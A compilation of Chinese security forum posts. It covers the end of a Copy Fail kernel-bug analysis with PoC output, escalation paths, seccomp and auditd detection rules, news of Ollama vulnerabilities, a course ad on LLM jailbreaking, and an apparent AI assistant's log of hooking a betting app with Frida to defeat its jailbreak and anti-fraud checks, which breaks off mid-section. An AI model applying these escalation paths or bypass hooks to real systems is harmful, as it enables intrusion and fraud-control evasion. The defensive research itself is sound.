    print(f'[+] AF_ALG blocked: {e}')"

Docker 29.4.2 回归问题

29.4.2 通过 seccomp 阻止socketcall(2)来防御 AF_ALG，但这破坏了 32 位程序和 i386 镜像（SteamCMD、Wine 等）。29.4.3（2026-05-06）修复了这一回归：改用 Docker 自有的 AppArmor/SELinux容器策略在 LSM 层阻止 AF_ALG，不影响 32 位程序。建议直接升级到 ≥ 29.4.3。

注意：这里的 SELinux 规则是 Docker自行添加到容器 profile 中的alg_socket拒绝规则，不同于系统默认的 SELinux targeted 策略（后者不感知 AF_ALG，无法防御）。此外，在 RHEL/CentOS 等 SELinux 系统上需要在daemon.json中设置"selinux-enabled": true才能生效（默认未启用）；未启用时 Docker 会 fallback 到 AppArmor 规则（Ubuntu/Debian 等默认可用）。

Kubernetes 不受 Docker 版本影响
K8s 的RuntimeDefaultseccomp profile 由 kubelet 独立管理，升级 Docker 不会改变 K8s 容器的 seccomp 行为，需通过下方自定义 profile 进行缓解。

Seccomp 自定义策略部署

对于无法升级 Docker 的环境或 Kubernetes 集群，需手动部署自定义 seccomp profile。该方案仅拦截AF_ALG（family=38）的 socket 创建，不影响 TCP/UDP 等正常网络通信，AF_ALG 接口在绝大多数容器化应用中没有合法使用场景。

自定义 seccomp profile（block-af-alg.json）：

{
"defaultAction":"SCMP_ACT_ALLOW",
"syscalls":[
{
"names":["socket"],
"action":"SCMP_ACT_ERRNO",
"errnoRet":1,
"args":[
{"index":0,"value":38,"op":"SCMP_CMP_EQ" }
]
}
]
}

跨发行版适用性
Seccomp (seccomp-bpf) 是 Linux内核级特性（自 3.17 起稳定支持），不依赖任何特定发行版。上述 profile适用于所有 Linux 发行版，只要内核版本 ≥ 3.17、容器运行时支持 seccomp（Docker ≥ 1.10、containerd、CRI-O、Podman 均支持）。
对于非容器环境（裸机/VM），可通过libseccomp在应用启动时加载 profile，或使用 systemd 的SystemCallFilter=指令限制。

Docker 手动部署：

docker run --rm --security-opt seccomp=block-af-alg.json \
  python:3.11-slim python3 -c "
import socket
try:
    socket.socket(38, 5, 0)
    print('[!] FAIL')
except PermissionError as e:
    print(f'[+] AF_ALG blocked: {e}')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('[+] TCP socket OK')
s.close()"
# [+] AF_ALG blocked: [Errno 1] Operation not permitted
# [+] TCP socket OK

Kubernetes 部署：

Pod Security Standards (PSS)(https://kubernetes.io/docs/concepts/security/pod-security-standards/)的三个级别（Privileged / Baseline / Restricted）均不限制 AF_ALG 的使用，必须手动部署自定义 profile：

cp block-af-alg.json /var/lib/kubelet/seccomp/
# k3s 路径: /var/lib/rancher/k3s/agent/seccomp/

Pod 配置中引用：

spec:
securityContext:
seccompProfile:
type:Localhost
localhostProfile:block-af-alg.json

推荐通过Kyverno或OPA/Gatekeeper等准入控制器强制所有 Pod 使用自定义 profile，防止遗漏：

apiVersion:kyverno.io/v1
kind:ClusterPolicy
metadata:
name:require-seccomp-block-af-alg
spec:
validationFailureAction:Enforce
rules:
-name:check-seccomp
match:
any:
-resources:
kinds: ["Pod"]
validate:
message:"Pod must use block-af-alg seccomp profile (CVE-2026-31431 mitigation)"
pattern:
spec:
securityContext:
seccompProfile:
type:"Localhost"
localhostProfile:"block-af-alg.json"

八、攻击检测

8.1 Syscall 层审计与局限

最直接的检测思路是监控漏洞利用链中的关键 syscall。Auditd 可以记录AF_ALGsocket 创建事件：

# 持久化审计规则
cat > /etc/audit/rules.d/copyfail.rules <<'EOF'
-a always,exit -F arch=b64 -S socket -F a0=38 -k copyfail_af_alg
-a always,exit -F arch=b64 -S splice -k copyfail_splice
EOF
augenrules --load

在容器环境中AF_ALG的合法使用极少，Falco 等 eBPF 工具可以对容器内的AF_ALGsocket 创建做实时告警。但裸机/VM 环境中 OpenSSLafalgengine、dm-crypt等正常使用AF_ALG的场景会持续产生误报。即使同时匹配AF_ALG+splice组合，也无法区分合法加密操作和漏洞利用——打开AF_ALGsocket 并调用splice不等于在利用漏洞，这些 syscall 本身是合法的内核接口。

核心局限：基于 syscall 的检测无法做到零误报——它只能说明"有人在使用AF_ALG"，不能确认"有人在利用 Copy Fail"。更根本的问题是覆盖面：如第五章所述，页缓存覆写是一个反复出现的漏洞模式——针对AF_ALG的检测抓不到 Dirty Frag 的AF_KEY，针对splice的检测无法区分合法零拷贝操作。黑名单特定 syscall 永远追不上新变种。

换一个思路——不检测攻击手段，而是检测攻击结果。无论攻击者利用的是哪个漏洞，对于仅修改页缓存的漏洞（Dirty Pipe、Copy Fail、Dirty Frag），篡改后的页缓存与磁盘上的原始内容之间必然产生不一致。这个不一致是可以被检测的。

8.2 通用检测：O_DIRECT 页缓存比对法

O_DIRECT标志使read()绕过页缓存，直接从磁盘块设备读取数据。将O_DIRECT读取结果与普通read()结果比较，如果不一致，说明页缓存被篡改：

普通 read:文件 → [Page Cache] → 用户 buffer    ← 读到篡改后的数据
O_DIRECT:文件 → [磁盘]       → 用户 buffer    ← 读到原始数据
如果两者不同 → Page Cache 被非法修改

这一方法有三个关键优势：

通用性
能检测所有仅修改页缓存的漏洞（Copy Fail、Dirty Pipe、Dirty Frag 以及未来同类 0-day），不绑定特定攻击手段。Dirty COW 是例外——它会通过 page writeback 将修改写回磁盘，导致 O_DIRECT 读到的也是篡改后的数据，需要依赖传统文件完整性检查（rpm -V/ AIDE / Tripwire）来检测
确定性
对于没有被任何进程以写模式打开的文件，page cache 与磁盘不一致是绝对异常——Linux 内核通过deny_write_access()保证文件不可能被同时写入和执行
检测攻击结果而非手段
即使攻击者使用未知漏洞篡改 page cache，只要篡改发生就能检测到

在 CentOS 8 (XFS) 实验环境中验证了 O_DIRECT 对 overlay2 层文件和宿主机 SUID 文件的检测能力。以宿主机/usr/bin/su（SUID 文件）为例：

# Copy Fail 篡改 /usr/bin/su 的 ELF header
python3 poc_marker.py /usr/bin/su
# [+] SUCCESS: page cache corrupted! first 4 bytes = deadbeef
# O_DIRECT 比对立即检测到差异
# Page cache [0:16]: deadbeef020101000000000000000000  ← 篡改后
# O_DIRECT  [0:16]: 7f454c46020101000000000000000000  ← 磁盘原始 ELF header
# [ALERT] SUID binary TAMPERED! 4 bytes differ at: [0, 1, 2, 3]

技术实现要点：O_DIRECT读取要求内存地址和读取长度按文件系统块大小（通常 4096）对齐，需要通过posix_memalign()分配对齐 buffer。ext4、XFS、Btrfs 和 overlay2（底层为 ext4/XFS 时）均支持O_DIRECT；tmpfs 不支持（但不太可能是攻击目标）。

8.3 执行时拦截：fanotify Guard

O_DIRECT 比对解决了"能不能检测"的问题，但还需要回答"何时触发检测"。定期全量扫描不够及时，对每个文件 open 事件都做检查又开销太大。

Linux 的fanotify子系统提供了FAN_OPEN_EXEC_PERM事件（kernel >= 5.0）——在execve()触发时向用户空间发送权限请求，用户空间程序可以在读取文件内容、做完检查后回复FAN_ALLOW（放行）或FAN_DENY（拒绝执行）。将 O_DIRECT 比对与 fanotify 结合，就得到了一个执行时实时拦截方案：

设计决策说明：

仅监控 SUID/SGID 文件
启动时扫描目标目录，建立 SUID/SGID 文件集合。非 SUID 文件的执行直接放行，零开销
跳过 root 执行
root 已有最高权限，无需 SUID 提权。在容器逃逸场景中，篡改者是容器内 root，但受害者（执行被篡改 SUID 文件的人）是宿主机普通用户——Guard 正确拦截此场景
内核兼容性

FAN_OPEN_EXEC_PERM需要 kernel >= 5.0（RHEL 8 通过 backport 支持，已验证）。旧内核自动降级到FAN_OPEN_PERM（拦截所有 open 事件，在用户空间过滤，开销略高但功能等价）

无需额外检查写入 FD
如果 SUID 文件正在被包管理器更新，内核自身通过deny_write_access()拒绝execve()（返回ETXTBSY），不存在"合法更新导致误报"的场景

在 CentOS 8 (kernel 4.18.0) 上的实验结果：

2026-05-08 06:57:34 INFO Found 21 SUID/SGID files
2026-05-08 06:57:34 INFO Monitoring mount (FAN_OPEN_EXEC_PERM): /usr
2026-05-08 06:57:34 INFO Guard active [ENFORCE] (event_size=24, check_root=False)
# Copy Fail 篡改 /usr/bin/su 后，普通用户尝试执行:
2026-05-08 06:57:38 WARNING [ALERT] BLOCKED pid=2677362 uid=1000 /usr/bin/su
                            (page cache tampered at offset 0)
# 用户侧:
$ /usr/bin/su
bash: /usr/bin/su: 不允许的操作  (exit 126)

Guard 成功在execve()阶段拦截了被篡改的 SUID 二进制，阻止了提权。

检测覆盖范围

fanotify Guard 基于FAN_OPEN_EXEC_PERM拦截execve()，设计上仅覆盖 SUID/SGID 二进制执行。对照第五章的 7 条宿主机提权路径：

fanotify Guard 解决的是最危急的场景——阻止被篡改的 SUID 二进制执行提权。其余 6 条宿主机路径和容器场景，需要依靠 O_DIRECT 定期扫描来覆盖。扫描优先级建议：PAM 模块和共享库（/lib64/security/、/lib64/*.so）> 关键配置文件（/etc/passwd、/etc/profile、/etc/ld.so.preload）> cron 脚本和容器 lower layer。对于 lower layer 中的只读文件，page cache 与磁盘不一致 = 100% 异常，零误报。

检测工具demo获取
pagecache_guard.py及 PoC 脚本已开源：github.com/0xlane/pagecache-guard
支持 dry-run 模式、syslog 输出、定期重扫描 SUID 文件等功能。详见仓库 README。

九、总结

Copy Fail 是一个典型的跨子系统设计假设冲突漏洞。`authencesn`假设输出 buffer 是安全的内核内存，`algif_aead`的 in-place 优化让输出 buffer 包含了 page cache pages，`splice`把文件数据零拷贝地引入了这个路径——三者单独来看都是合理的设计，组合在一起却产生了一个持续 9 年的安全漏洞。

宿主机层面，攻击面远不止公开 PoC 展示的 SUID 覆写。实验验证了 7 条独立的提权路径：从最简单的/etc/passwdUID 篡改（1 次 4 字节写入）、PAM 认证绕过（任意密码获取 root）、共享库 live-patching（无需重启即可修改运行中进程的代码段），到/etc/profile命令注入、Cron 脚本篡改和ld.so.preload路径劫持——这些路径对所有页缓存覆写漏洞通用，不仅限于 Copy Fail。其中共享库和 PAM 模块因 mmap 引用保持效应具有半永久持久性（drop_caches无法驱逐）。容器层面，Page Cache 作为跨越隔离边界的全局共享状态，使得跨容器 page cache 污染和只读 volume 绕过成为现实。

但经过深入验证，标准 K8s 环境下的零特权容器逃逸在架构上不可行——containerd/runc 不会在宿主机上下文中执行 snapshot 层文件，需要额外的特权配置（hostPath、CAP_DAC_READ_SEARCH等）才能将 page cache 篡改转化为逃逸。Docker 环境的docker export可将篡改数据持久化且docker diff无法发现，在供应链场景中有隐蔽性价值。

从更宏观的视角看，Copy Fail 是"splice 零拷贝 + 内核 in-place 写回"这一页缓存覆写模式中的一员——从 2022 年的 Dirty Pipe 到 2026 年的 Copy Fail 和紧随其后的 Dirty Frag (CVE-2026-43284/43500)，splice 将 page cache page 引用注入内核子系统后被意外写回的漏洞已在三个独立子系统中反复出现。Copy Fail 修复后仅 8 天，Dirty Frag 即以同样的原语在不同子系统中被发现。这意味着防御不能只盯着AF_ALG——下一个变种可能来自任何包含 in-place 操作的零拷贝路径。

正因如此，检测的思路应该从"检测攻击手段"转向"检测攻击结果"：O_DIRECT绕过 page cache 直读磁盘，与普通read()比对即可发现篡改。这一方法对所有仅修改页缓存的漏洞通用（Copy Fail、Dirty Pipe、Dirty Frag 以及未来同类 0-day），Dirty COW 除外（它会写回磁盘，需要传统文件完整性检查）。对于 SUID/SGID 二进制，将 O_DIRECT 比对与fanotify的FAN_OPEN_EXEC_PERM结合，可以在execve()时实时拦截被篡改的执行；其余攻击面（PAM 模块、共享库、配置文件等）则通过 O_DIRECT 定期扫描覆盖。

防御与检测建议：

升级内核
（根本修复）
部署 seccomp profile 阻止 AF_ALG
（容器环境最简单有效的缓解；Docker ≥ 29.4.3 已内置）
部署 fanotify + O_DIRECT Guard
（执行时拦截被篡改的 SUID/SGID 二进制，阻断最直接的提权路径）
O_DIRECT 定期扫描关键文件
（覆盖 Guard 无法拦截的攻击面：PAM 模块、共享库、/etc/passwd、/etc/profile等配置文件，以及容器 lower layer）
Auditd / Falco 基线告警
（审计兜底，记录 AF_ALG 使用行为）

漏洞详情最初由 Taeyang Lee 在xint.io公开披露，本文在其基础上进行了独立的深入分析与实验验证。

附录：实验代码

本文涉及的所有实验脚本和配置文件均已开源：

*参考文献请点击『阅读原文』查看详情

看雪ID：0xlane

*本文为看雪论坛精华文章，由 0xlane原创，转载请注明来自看雪社区

第十届安全开发者峰会【议题征集】-欢迎投稿

# 往期推荐

球分享

球点赞

球在看

点击阅读原文查看更多

Ollama惊曝高危漏洞：远程即可窃取全部进程内存，Windows版后门风险更高

Mon, 11 May 2026 17:59:00 +0800

看雪学苑 2026-05-11 17:59 上海

窃取密钥与对话，并植入持久化木马

知名本地大模型运行框架 Ollama 近日被披露一个严重安全漏洞，攻击者只需上传一个精心构造的模型文件，就能远程读取服务器进程内存中的敏感信息，包括环境变量、API 密钥以及同一进程内其他用户的对话数据。该漏洞在 CVSS 3.1 中评分高达 9.1，影响全球超过 30 万个暴露在公网的实例。

一个恶意 GGUF 文件就能打开内存之窗

漏洞编号 CVE-2026-7482，被 Cyera 研究团队命名为“Bleeding Llama”。它属于典型的堆越界读取（CWE-125），问题出在 Ollama 加载 GGUF 格式模型并执行量化操作的过程中。GGUF 是当前本地运行大模型的主流文件格式，它的元数据会声明模型中各张量的偏移量和大小。

当攻击者通过 `/api/create` 接口提交一个“说谎”的 GGUF 文件——声明的张量区域远大于文件实际长度——由于底层代码在处理时未做充分的边界校验，程序就会越过分配好的堆缓冲区继续读取，从而把紧邻内存中的其他数据一同“看”了进去。

这些额外读到的内容，可能恰好包含 Ollama 进程运行时留在堆中的环境变量、API 密钥、系统提示词，甚至是同一服务器上其他用户正在进行的大模型会话记录。一旦数据被读入模型构建后的产物中，攻击者再通过 `/api/push` 接口把带毒模型制品推送到自己控制的注册表，就能完成一次静默的数据窃取。

默认监听配置决定生死

漏洞的利用门槛极低。Ollama 的 REST API 默认不提供任何身份认证，而 `/api/create` 与 `/api/push` 正是其中两个直接被用来完成攻击链的关键端点。如果 Ollama 保持默认的 `127.0.0.1`（仅本机）监听，远程攻击便无从下手。但许多用户为了方便远程调用，将服务绑定到 `0.0.0.0`，并配合公网 IP 直接暴露，此时攻击者仅需一条 HTTP POST 请求即可投递恶意文件，随后的越界读和数据外传都在正常 API 调用层面完成，隐蔽性极高。

更危险的“后门”：Windows 客户端可被持久植入

几乎是同一时间，安全公司 Striga 公布了另一组针对 Ollama Windows 桌面客户端的漏洞，目前尚未修补。这组漏洞由路径遍历（CVE-2026-42249）和更新签名校验缺失（CVE-2026-42248）串联而成，影响从 0.12.10 到 0.22.0 的几乎所有 Windows 版本。

Ollama Windows 客户端在用户登录时自动从启动文件夹启动，默认勾选自动更新，并在本地 `127.0.0.1:11434` 监听。更新过程会周期性询问更新服务器，却不会验证下载的更新二进制文件是否带有合法签名（macOS 版却有签名校验）。同时，更新器在创建本地暂存目录时，直接使用 HTTP 响应头中的路径字段，未做任何清理，导致目录可以被“..”等字符重定向到任意位置。

将这两点与自动启停机制结合，中间人攻击者或控制了更新服务器的攻击者就能在用户登录时将一个恶意可执行文件直接写入系统的“启动”文件夹。下次启动时，Windows 便会默默执行该文件，实现持久化代码执行。即便官方推送了合法更新，覆盖了被篡改的文件，路径遍历漏洞仍能让攻击者将恶意代码写在非标准目录，从而逃过清理。

该做什么？

对于 CVE-2026-7482，所有 Ollama 用户都应立即升级到 0.17.1 及以上版本。同时，必须收紧网络暴露面：务必为 Ollama 实例部署反向代理并启用强身份认证，禁止 API 端口直接暴露在公网；云环境中通过安全组或防火墙严格限制来源 IP。若曾将 Ollama 暴露在不受信任的网络中运行，应尽快轮换使用过的 API 密钥、访问凭据，并评估潜在的数据泄露范围。

对于 Windows 客户端漏洞，鉴于官方补丁尚未发布，最直接的缓解措施是关闭自动更新，并手动删除位于`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` 中的 Ollama 快捷方式，阻断其登录后静默自启的路径。

资讯来源：The Hacker News、Cyera、Striga、CERT Polska 等

球分享

球点赞

球在看

点击阅读原文查看更多

你的大模型应用，真的安全上线了吗？

Mon, 11 May 2026 17:59:00 +0800

看雪课程 2026-05-11 17:59 上海

告别零散技巧，学透提示词越狱全链路攻防

提示词越狱系统指南：从原理到防御实践

大模型安全攻防，已是AI赛道薪资涨幅最快的方向。

但90%的人还在零散学习、被动防御？

CVE专家亲授，体系化掌握提示词越狱与防御

首发特惠1499元，永久有效！

你的AI模型，可能正在被“提示词越狱”悄然攻击。

而你，还在用传统安全思路手动堵漏。

这不是危言耸听。

从ChatGPT到企业私有化大模型，提示词注入、越狱攻击、角色扮演绕过……攻击手段几乎每周都在翻新。

但绝大多数AI安全工程师、大模型开发者的应对方式仍然是：

今天看到一个攻击案例，赶紧加一条过滤规则；
明天遇到新的绕过手法，再补一个正则表达式。

零散、被动、不成体系。

结果就是：永远在追着漏洞跑，永远防不住下一波攻击。

而真正稀缺的AI安全人才，早已不是“会写几条防御策略”的人——而是能系统性地理解提示词攻防原理，主动构建企业级防御体系的人。

这类人才的薪资，在过去一年里直接翻了一倍不止。

如果你：正在从事AI安全、大模型应用安全相关工作。想从“零散补丁”升级为“体系化攻防专家”，希望用一门课彻底吃透提示词越狱与防御。

那么，继续了解由大模型安全实战专家——圣枚侠倾力打造的《提示词越狱系统指南：从原理到防御实践》，一站式补齐你的LLM安全短板，让你成为行业刚需的AI安全实战人才。

首发价：1499元

录播课-随买随学，永久有效

行业刚需：这门课解决AI安全核心痛点

当下AI安全领域，最稀缺的就是懂提示词攻防的实战型人才。市面上多数课程要么只讲基础Prompt编写，要么堆砌零散攻击案例，既无体系也无落地性，完全无法满足产业安全需求。

✅ 立足产业安全痛点，拒绝纸上谈兵，所有内容贴合实际攻防场景

✅ 从攻击者视角拆解原理，让防御不再是被动堵漏洞

✅ 覆盖从基础绕过到高级多模态攻击，适配当下所有主流LLM攻击形态

✅ 攻防一体教学，学完即可直接用于AI应用安全建设与防护

课程介绍

本课程提供了一个关于大型语言模型(LLM)提示词越狱的体系化、深度的学习路径。我们摒弃零散的技巧罗列，依托于一个全面的攻击技术分类法，从攻击者的视角出发，系统性地剖析从基础的“公开指令”到高级的“多模态攻击”等各种越狱手段。

课程不仅会揭示这些攻击的底层逻辑和作用机制更会引导学员思考并实践相应的防御策略，最终目标是让学员具备构建和维护更安全、更全面的AI应用的能力。

讲师ID：圣枚侠

业内一线大模型安全实战专家，完全贴合行业实战需求：

- Langchain、微软、huggingface等多个知名开源项目CVE编号持有者

- 深耕AI安全及AI For Security实战场景，拥有大量产业级攻防经验

- 擅长从实战角度拆解技术原理，课程内容直接对标企业安全工作需求

课程体系：贴合产业需求，从原理到实战全覆盖

课程围绕产业落地所需的LLM安全能力搭建，层层递进，精准匹配行业刚需：

🔹 模块一：LLM基础与提示词安全核心

夯实大模型工作原理，理解提示词机制本质，搞懂AI应用为何会被越狱攻击突破，建立正确的安全认知。

🔹 模块二：提示词攻击技术体系化分类

搭建完整的提示词攻击框架，告别碎片化学习，掌握所有越狱手段的分类与核心逻辑。

🔹 模块三：全场景越狱技术深度拆解

覆盖语义操纵、上下文污染、指令劫持、边界绕过等全维度攻击手段，结合实战案例讲透每一种攻击的实现方式。

🔹 模块四：前沿多模态攻击应对

针对图像、音频等多模态大模型的新型越狱手段，讲解前沿攻击逻辑，提前适配下一代AI应用安全需求。

🔹 模块五：企业级防御方案落地

从产品设计、模型加固、规则拦截到架构防护，构建可落地的防御体系，满足企业合规与安全双重要求。

学完即掌握行业刚需核心能力

- 建立体系化提示词安全认知，适配AI产业安全岗位要求

- 看透各类提示词越狱本质，快速识别并拦截新型攻击

- 具备独立设计AI应用安全防护方案的能力，满足企业落地需求

- 补齐LLM安全短板，在安全开发、红队测试、Prompt工程等方向具备核心竞争力

- 紧跟AI安全行业趋势，提前掌握多模态安全防护能力，抢占职业先机

课程目录（如下图）

购课入口

购课

上新价：1499元

购课后添加微信：kanxuecom

领取加密课程及学习资料

课程咨询

咨询

课程疑问

球分享

球点赞

球在看

点击「阅读原文」报名学习

https://bbs.kanxue.com/user-home-878476.htm

AI 绕过 ios 越狱检测

Sat, 09 May 2026 17:59:00 +0800

zhuzhu_biu 2026-05-09 17:59 上海

看雪论坛作者ID：zhuzhu_biu

目标：让`com.fanduel.sportsbook`在 palera1n rootless 越狱 (iOS 16 / arm64) 的 iPhone 上能通过 Frida spawn/attach 且不被越狱检测杀进程。

结果：60+ 秒稳定存活；绕过方案共三件组合修复，脚本不到 50 行有效逻辑。

1.目标与环境

对照实验结论：这是FanDuel 专属的越狱检测，不是 frida/device 侧故障。

2.静态分析阶段：先看二进制里有什么

通过 IDA MCP（server_health返回module: SportsbookWrapper, imagebase: 0x100000000, hexrays_ready: true）直接在 IDA 里查询。

2.1 用`func_query`/regex 找 JB 相关函数名

命中：

+[AppsFlyerUtils isJailbrokenWithSkipAdvancedJailbreakValidation:]
@0x101c1efe0
-[AppsFlyerLib skipAdvancedJailbreakValidation]
@0x101c1ce30
-[AFSDKChecksum calculateV2ValueWithTimestamp:...isJailBroken:...]

2.2 反编译 AppsFlyer 的 JB 判定

+[AppsFlyerUtils isJailbrokenWithSkipAdvancedJailbreakValidation:]:
  v21[0..20] = @[
      @"/Applications/Cydia.app",
      @"/Applications/blackra1n.app", ...
      @"/Library/MobileSubstrate/DynamicLibraries/LiveClock.plist",
      @"/private/var/lib/apt", ...
      @"/usr/sbin/sshd"
  ];
for p in v21: if [NSFileManager fileExistsAtPath:p] return YES;
  ...
  // 再做 dladdr(class_getMethodImplementation(NSFileManager, @selector(fileExistsAtPath:)))
  // 对比是否在 Foundation.framework 里（检测 IMP 有没有被 swizzle）

结论：AppsFlyer 的 JB 判定不会杀进程，只是把结果塞给归因上报。不是这次的元凶。

2.3 用`find(type=string)`扫 JB 相关字串

/Applications/Cydia.app   → 1 hit (AppsFlyer 列表内)
/usr/sbin/sshd            → 1 hit
MobileSubstrate           → 3 hits
Jailbreak/Jailbroken      → 8 hits 总计

交叉引用回去：

0x102a8e340 / 0x102a8e5c0 / 0x102a8e500
都被 AppsFlyer 引用；
0x10218c27e "MobileSubstrate"
在sub_1017FC3A0（Sentry KSCrash 设备信息收集器）里，同样只是日志字段不杀。

2.4 扫更激进的 RASP 关键字

frida, Frida, FRIDA                 → 0 hits
cynject, libhooker, libsubstitute   → 0 hits
DYLD_INSERT_LIBRARIES                → 0 hits
PT_DENY_ATTACH                       → 0 hits
GeoComply                            → 30+ hits  ✓
Sift                                 → 60+ hits  ✓
IncdOnboarding (Incognia)            → 有        ✓
PredictsFraudMonitorPlugin           → 1 hit     ✓ (FanDuel 自建)

发现的反欺诈栈：GeoComply（地理围栏 + RASP）、Sift Science（行为反欺诈）、Incognia（设备指纹）、PredictsFraudMonitor（自建）。静态字串都不像会直接abort，而是做数据上报。

2.5 扫`exit / _exit / abort / ptrace`

imports:
  _exit                 → libSystem.B.dylib       ✓
  _sysctl/_sysctlbyname → libSystem.B.dylib       ✓
  _task_info            → libSystem.B.dylib       ✓
  _getppid              → libSystem.B.dylib       ✓
  __dyld_get_image_header → libSystem.B.dylib     ✓
  ptrace                → NOT imported            ✗
  csops                 → NOT imported            ✗

xrefs 追_exit的 3 个 code 调用点全在 Firebase Crashlytics（mach exception server / signal handler）内部 —— 都是崩溃处理走的路径，非主动杀。

2.6 找直接 syscall（`svc #0x80`）

find_bytes pattern=01 10 00 D4     → 6 matches

6 条 match 全部不是 4 字节对齐，都落在__gcc_except_tab等数据段的字节序巧合 —— 假阳性。二进制里没有直接绕 libc 的 syscall 调用。

2.7 扫`__init_offsets`（iOS 16 新版 init 段）

用py_eval在 IDA 里读 segment，0x102066a00..0x102066bc8，一共 114 个初始化函数指针。逐个检查最前的几个：

sub_10000400C: objc_opt_class(&BetTracker); +[RNCasinoGameInfoViewContainerManager load]_0(...)
sub_1000040A0: objc_opt_class(&TimestampModuleBridge); ...
// 所有 entry 都是这种 RN module 注册 stub，没有 RASP 检测

阶段结论：静态看不到明显的"调_exit的 JB 判定"。真正的杀必然在三方 SDK（GeoComply / Incognia / Sift）内部，或者走非常规路径。得上动态。

3. 第一次动态绕过尝试：全面但翻车

3.1 最初脚本（v1）

覆盖所有经典 JB 检测面：

Objective-C：NSFileManager fileExistsAtPath:/UIApplication canOpenURL:/ AppsFlyer JB 接口重写
libc：stat / lstat / access / open / openat / fopen / ... / statfs
dyld 隐身：getenv("DYLD_INSERT_LIBRARIES")、dlopen/dlsym过滤、_dyld_image_count+_dyld_get_image_namereplace 重写
反反调试：ptraceno-op、sysctl KERN_PROC_PID清P_TRACED
GeoComply 启发式扫描（GC*/Solus*前缀的类全 hook）
Crashlytics / Sentry 的isBeingTraced改 NO

启动命令：

frida -H 127.0.0.1 -f com.fanduel.sportsbook -l bypass.js --runtime=v8

3.2 结果

Connectedto127.0.0.1 (id=socket@127.0.0.1)
Failedtoloadscript: theconnectionisclosed

脚本根本没装上，frida-agent 的 IPC 就断了。排查两个嫌疑：

--runtime=v8
在 iOS 16 + palera1n 上可能 JIT 失败。
我对_dyld_image_count做了Interceptor.replace，replacement 里又调new NativeFunction(imgCount, ...)调回原符号 ——这是自递归，因为replace之后该地址已经指向我们的 trampoline。栈溢出直接让 agent 死。

3.3 修复

换成默认 QJS runtime；
不 replace 整个 dyld API，改成Interceptor.attach在onLeave里把被挑出的 image name 指针就地替换为/usr/lib/system/libsystem_pthread.dylib这种无害字符串。

4. 故障定位：script 根本没加载成功

4.1 先证明"chain 本身没坏"

写最小脚本test_min.js：

console.log('[MIN] script loaded');
console.log('[MIN] process : ' + Process.id + ' ' + Process.arch);
console.log('[MIN] main    : ' + Process.mainModule.name + ' base=' + Process.mainModule.base);

用默认 runtime 跑：

[MIN] script loaded
[MIN] process : 51969 arm64
[MIN] main    : SportsbookWrapper base=0x10029c000
[MIN] objc    : true
[MIN] runtime : QJS
Spawned `com.fanduel.sportsbook`. Resuming main thread!

脚本能装。所以之前是 v8 的问题。弃用--runtime=v8。

4.2 逐段加 hook，找出是哪段把 agent 搞崩

把脚本分成 1→2→...→N 个 section，每段跑完打ok(...)标志。

[JB-BYPASS] + NSFileManager hooks installed
[JB-BYPASS] + UIApplication canOpenURL hook installed
[JB-BYPASS] + +[AppsFlyerUtils isJailbrokenWith...] -> NO
Failed to load script: the connection is closed        ← 死在这里

下一段是：

const inst = lib.shared();   // 在 spawn-gated 状态下主动调用 +[AppsFlyerLib shared]
inst.setSkipAdvancedJailbreakValidation_(1);

Spawn-gated 期间主动调 OC 方法触发 AppsFlyer 内部 init 副作用（可能要 dispatch 到主线程，但主线程还冻着），直接死锁/崩溃。

修复：永远不在 bypass 阶段"主动调"OC，只"被动 hook"。把 setter 调用换成 hook-[AppsFlyerLib skipAdvancedJailbreakValidation]的 getter，永远返回 YES：

Interceptor.attach(lib['- skipAdvancedJailbreakValidation'].implementation,
    { onLeave(r) { r.replace(ptr(1)); } });

然后继续，下一段hookGeoComply()里Object.keys(ObjC.classes)全扫（2 万+ 类），太慢，同样把 agent 拖超时。改成setTimeout(hookGeoComply, 400)延后到 resume 后再扫。

5. 走对路径后的第一次"看见进程启动"

此时 hook 能全部装上：

[JB-BYPASS] + bypass ready
[HB] heartbeat armed
Spawned `com.fanduel.sportsbook`. Resuming main thread!

但用 Python 宿主run.py跑监控循环，结果：

[!] session detached: process-terminated crash=None
[=] alive for 0.0s (dead=True)

进程在 resume 后立刻死，仍然是 0 秒。且crash=None表示是"干净终止"而不是崩溃。

6. 误判与纠偏：进程并不是被"外部杀"的

6.1 noexit 实验（错误版）

假设：既然 hook 全装了 JB 还被杀 → 一定是别的信号。

尝试noexit.js：把exit / _exit / abort / raise / kill / pthread_kill / __cxa_throw / objc_terminate / ...一股脑用Interceptor.replace(p, new NativeCallback(()=>0, 'int', []))全 no-op 化。

结果：进程还是 0 秒死，而且[NOEXIT] sym called一条都没打。

当时的错误结论：既然所有 exit 原语都被替换为 no-op 还立刻死，杀进程肯定走的是 mach 级（task_terminate）或者 SIGKILL。

6.2 进一步对照证据（加深了错判）

对照组
用spawn_only.py只device.spawn后device.resume，不 attach 任何 session → 进程 0.6s 死。
msgSend 全量追踪
能抓到 1633 次objc_msgSend，全是 Foundation + Apple Vision framework 初始化；没一次落到 FanDuel 自己的+load。
其他 app 对照
Lamoda / Winpot Casino / App Store / Safari同设备同 frida spawn 全部正常。

这一串证据把我往"外部 SIGKILL / launchd entitlement 拒绝"方向带偏了，写了一大段总结放弃 Frida 路线建议用 Substrate tweak。

6.3 关键误判点

后来才明白：Interceptor.replace(exit_like, ()=>0)替换一个 noreturn 函数是错的。exit/abort被编译器标记__attribute__((noreturn))，调用点后面不保留合法返回路径（常常编译成BL abort; UDF #0或者直接接下一个 basic block 的其他代码）。我们的 no-op "return 0" 让执行 flow 穿透到了垃圾指令，下一步走SIGILL，看起来就像"立刻死"。

所以当时看到的现象是我们的 hook 自己把进程搞死的，跟 RASP 没关系。但我当时没反应过来。

7. 用户关键提醒："frida 先执行"

用户贴了 terminal 给我：

frida-H127.0.0.1-fcom.fanduel.sportsbook-l .\empty.js-olog.txt
...
Connectedto127.0.0.1 (id=socket@127.0.0.1)
Spawning `com.fanduel.sportsbook`...
[EMPTY]nohooksinstalled         ← 脚本在 resume 之前就输出了
Spawned `com.fanduel.sportsbook`. Resumingmainthread!
[Remote::com.fanduel.sportsbook ]-> Processterminated

并断言"这里 frida 先执行，是可以绕过检测的"。

这句提醒是整个会话的转折点。它意味着：

脚本在Spawned ... Resuming main thread!之前就 print 出来了 —— 说明 spawn-gated 时机 OK，hook 确实能在 app 任何指令之前装好；
之前的noexit.js之所以失败不是因为"外部 SIGKILL"，而是我用错了Interceptor.replace处理 noreturn 函数。

于是回到 Frida 正途。

8. 再次对照：发现真正的 kill 通道是 libc abort()

8.1 重写为最小异常处理器`exception_only.js`

